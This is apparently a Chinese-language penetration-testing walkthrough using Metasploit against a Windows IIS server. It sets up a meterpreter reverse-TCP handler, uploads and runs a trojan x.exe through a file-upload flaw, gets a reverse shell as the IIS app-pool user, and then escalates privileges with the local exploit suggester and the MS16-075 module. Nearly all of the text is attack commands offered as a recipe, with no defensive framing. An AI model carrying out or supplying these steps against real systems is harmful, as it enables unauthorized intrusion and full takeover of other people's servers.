msfconsole msf > use exploit/multi/handler msf expolit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf expolit(multi/handler) > set lhost 0.0.0.0 msf expolit(multi/handler) > set lport <port_local> msf expolit(multi/handler) > exploit
受害者上线
利用文件上传漏洞上传木马x.exe
在受害者系统执行木马
1
.\x.exe
成功上线后会获取反弹的Shell
1
meterpreter > getuid
1
Server username: IIS APPPOL\DefaultAppPool
提权
切换会话到后台
1
meterpreter > background
查看可以利用的漏洞编号
<id>:会话编号
1 2 3
msf > use post/windows/gather/enum_patches msf (windows/gather/enum_patches) > set session <id> msf (windows/gather/enum_patches) > run
直接筛选可以利用的模块
<id>:会话编号
1 2 3 4
msf > use post/multi/recon/local_exploit_suggester msf (multi/recon/local_exploit_suggester) > set session <id> msf (multi/recon/local_exploit_suggester) > set showdescription true msf (multi/recon/local_exploit_suggester) > run
返回的结果中为Yes的模块可以直接利用
利用模块为指定会话提权
<id>:会话编号
1 2 3
msf > use exploit/windows/local/ms16_075_reflection_juicy msf (windows/local/ms16_075_reflection_juicy) > set session <id> msf (windows/local/ms16_075_reflection_juicy) > run